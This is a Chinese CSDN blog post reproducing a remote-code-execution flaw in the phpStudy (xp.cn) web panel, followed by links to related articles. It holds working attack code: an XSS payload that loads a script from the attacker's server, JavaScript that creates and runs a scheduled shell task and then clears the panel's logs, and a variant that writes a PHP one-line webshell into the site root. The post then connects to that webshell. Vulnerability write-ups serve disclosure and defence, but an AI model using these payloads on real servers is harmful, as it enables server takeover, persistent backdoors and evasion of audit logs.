phpstudy 小皮web面板 RCE漏洞

最新推荐文章于 2024-10-24 13:54:55 发布
最新推荐文章于 2024-10-24 13:54:55 发布
阅读量1.5k 收藏 3
点赞数 2
分类专栏: 红蓝对抗 Web渗透测试 文章标签: 安全 运维
原文链接:https://mp.weixin.qq.com/s/5w4yE3xX-Ep72O6GJy569g
版权
文章详细描述了phpstudy小皮面板存在的RCE漏洞,该漏洞源于一个存储型XSS,攻击者可利用此漏洞通过系统登录的XSS配合后台计划任务功能执行任意系统命令,甚至写入webshell。文章提供了漏洞复现的步骤,包括如何构造XSSpayload和利用计划任务执行PHP代码。
摘要由CSDN通过智能技术生成

一、漏洞描述

最近爆出phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。

二、漏洞复现

首先在官网下载最新的小皮windows面板安装程序

访问xp.cn

在本地进行安装

安装完成之后会弹出访问地址,如下

访问系统登录面板,页面显示如下

首先在用户名登录的地方插入弹窗的xss代码验证是否存在漏洞

然后再用管理员账号登录系统

可以看到确实触发弹窗了,这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了

紧接着该系统的后台有一个计划任务功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。具体步骤如下

在vps上部署我们需要插入的js文件,内容显示如下(在服务器的www目录下写入验证txt文件)

function poc(){  $.get('/service/app/tasks.php?type=task_list',{},function(data){    var id=data.data[0].ID;    $.post('/service/app/tasks.php?type=exec_task',{      tid:id    },function(res){      $.post('/service/app/tasks.php?type=set_task_status',{        task_id:id,        status:0      },function(res1){        $.post('/service/app/tasks.php?type=set_task_status',{          task_id:id,          status:0        },function(res2){          $.post("/service/app/log.php?type=clearlog",{            type:"clearlog"          },function(res3){},"json");        },"json");      },"json");    },"json");  },"json");}function save(){  var data=new Object();  data.task_id="";  data.title="test";  data.exec_cycle="1";  data.week="1";  data.day="3";  data.hour="13";  data.minute = "51";  data.shell="echo swzaq >D:/phpstudyweb/xp.cn/www/1.txt";  $.post('/service/app/tasks.php?type=save_shell',data,function(res){    poc();  },'json');}save();
这里的hour代表时,minute代表分

PS:这里需要清空日志,避免重复触发,不然很容易把真实环境搞崩

然后在登陆的用户名处插入如下代码

<script src=http://10.1.120.231:8000/poc.js></script>

只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件

因为小皮面板这个运维系统类似于宝塔,所以其中会部署网站

 

这里写入webshell的话可以向网站目录下写,如

D:\phpstudyweb\xp.cn\www\wwwroot\admin\localhost_80\wwwroot

将上面的poc改造如下

function poc(){  $.get('/service/app/tasks.php?type=task_list',{},function(data){    var id=data.data[0].ID;    $.post('/service/app/tasks.php?type=exec_task',{      tid:id    },function(res2){        $.post('/service/app/log.php?type=clearlog',{                    },function(res3){},"json");                  },"json");  },"json");}function save(){  var data=new Object();  data.task_id="";  data.title="test";  data.exec_cycle="1";  data.week="1";  data.day="3";  data.hour="14";  data.minute = "20";  data.shell='echo "<?php @eval($_POST[123]);?>" >D:/phpstudyweb/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';  $.post('/service/app/tasks.php?type=save_shell',data,function(res){    poc();  },'json');}save();

执行完成之后可以看到写入php文件成功了

用蚁剑测试连接

安全大哥
关注
专栏目录
漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 5668
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE
网安复现系列:phpStudy 小皮 Windows/Linux 面板 XSS到RCE漏洞
weixin_54626591的博客
05-06 261
phpStudy 小皮 Windows/Linux 面板 XSS到RCE漏洞
phpstudy漏洞
PushSafe
04-04 960
PHP study 漏洞洞讲解 环境需要: 1.phpstudy 8.1.0.7 + nginx 1.5.11 pw:d3yw 搭建环境: 预期之内 phpstudy.exe安装完会是这样。 然后将 upload文件放在www文件夹下 然后打开form.html 开始复现。 漏洞原理: 研究ing ...
【数据库】基于小皮(PHPstudy面板集成环境 MySQL数据库环境配置
最新发布
qq_52611686的博客
10-24 2095
一款非常好用的数据库工具,phpstudy小皮)可以不从官网上面下载和配置Mysql,当然感兴趣的也可以试试去官网下载MySQL的原始方法(本来想写那个的,但发现已经有太多完备的blog来进行说明了),而且我更喜欢小皮胜过于Navicat。输入【用户名】:root 【密码】:root(默认密码),进行登录,就可以成功访问数据库了,并且可以图形化查询数据库、数据表等,进行增删改查。安装完成之后,在【首页】开启MySQL服务,之后点击【数据库工具】打开,选择【phpMyAdmin】,进入管理页面。
phpstudy小皮Windows面板RCE漏洞
今天是几号的博客
04-01 739
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1523
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
小皮面板rce漏洞
weixin_61785633的博客
03-31 467
Linux也有不少规则,我们如果就按这种写法就会出现报错,不过我们却可以用双引号闭合,它只会把双引号所包含的数据写进文件中。这种方式,不过这也没关系,因为我们知道其实$_POST[]里面也有不用引号闭合的方式,那就是输入数字,变成$_POST[123],ok这下就修改完成了,后面在改改文件所在位置就行了,别文件传进去了,却访问不到木马文件。这就是我们当时登录时,所留下的记录,本来可以通过这个日志,知道有谁尝试登录过我们的小皮面板,但我们输入的js代码,会被它解析并运行,这就导致了xss漏洞
小皮Phpstudy面板存在任意命令执行漏洞-公开版本
04-20
漏洞最早由渊龙Sec安全团队在春节期间发现,经过深入研究,确认了小皮Phpstudy面板存在多处安全隐患,包括但不限于未授权访问、跨站脚本(XSS)、任意文件上传与写入以及远程命令执行(RCE)等。整体来看,这些漏洞的...
PhpStudy面板严重安全漏洞:任意命令执行风险
"小皮Phpstudy面板存在任意命令执行漏洞,包括未授权访问、XSS漏洞、任意文件上传、任意文件写入以及远程代码执行(RCE漏洞。这些漏洞的危害性评级高,利用难度相对较低,只需要一次点击(1Click)即可触发。...
Web中间件常见安全漏洞总结
qq_40907977的博客
08-14 6788
IIS IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS目前只适用于Windows系统,不适用于其他操作系统。 解析漏洞 IIS 6.X 基于文件名 该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; 号及其后面的内容,相当于截断。 基于文件夹名 该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。 另外,IIS6.
漏洞复现】phpStudy 小皮 Windows面板 存在RCE漏洞
xt350488的博客
07-26 645
如上图可以看到确实触发XSS弹窗,这是因为整个系统在加载的过程中会读取操作日志的内容,刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本,所以执行显示了登录系统失败。这个时候我们再去访问这个php木马,这个时候就可以直接使用【蚁剑】连接,连接就不演示了(图不小心删了)此时你会发现你访问了这个php, 自动下载了这个文件,并没有执行,说明是纯静态的网页,我们也就使用。这个时候我们去网站后台看php版本,没有选择,选择指定的版本并保存就好。此时再输入正确的密码,成功弹窗。
phpstudy_小皮Web面板_RCE漏洞
Ryan的博客
02-08 577
最近爆出phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE
PhpStudy2016-2018-RCE 漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 1450
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
小皮面板 phpstudy的坑
S_ZaiJiangHu的博客
05-14 1182
1、composer 1先在phpstudy里安装composer 然后会显示版本过低 之后再linux系统根目录下 使用composer self-update 命令 更新composer
phpstudy小皮面板RCE漏洞_XSS盲打
G3et的博客
02-07 415
最近爆出的phpstudy小皮面板存在RCE漏洞,通过分析和复现发现是一个存储型xss漏洞导致的RCE,这是一个很简单的1click的RCE,通过系统登录用户名输入出的xss配合系统后台自动添加计划任务来实现RCE
PHPStudy漏洞:我们该如何看待?
ab524100的博客
07-16 358
在互联网的世界里,PHPStudy作为一款集PHP环境、开发工具、教程于一体的集成开发环境(IDE),受到了许多初学者的喜爱。由此可见,随着其使用的广泛,一些安全问题也逐渐浮出水面,那就是我们常说的“PHPStudy漏洞”。说到PHPStudy漏洞,可能很多人会有些紧张,毕竟它涉及到我们的网站安全和数据安全。这并不是说PHPStudy本身不好,而是说我们在使用它的时候,需要保持警惕,了解可能存在的风险。二是定期更新和修补。我们应该多了解一些关于PHPStudy漏洞的知识,了解可能存在的风险和危害。
Phpstudy(小皮面板) nginx 解析漏洞
PANDA墨森的博客
09-02 3030
一、Phpstudy(小皮面板)简介: PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。 二、漏洞简介: 自从2019年Phpstudy爆出的后门事件已经过去一段时间了,期间也没有爆出过什么漏洞,并且现在Phpstudy(小皮面板)已经改版了,这次爆出的漏洞是nginx的解析漏洞,也就是存在已久的/xx.php解析漏洞 漏洞原理: 1、由于用户.
快速掌握PHPstudy小皮面板安装与配置全攻略
小皮面板是一个Web端管理界面,通过浏览器即可访问,安装过程中需要注意路径问题,避免包含中文字符,以防止安装失败。安装成功后,用户会收到初始化信息,并通过输入用户名和密码登录面板。 登录小皮面板后,首要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值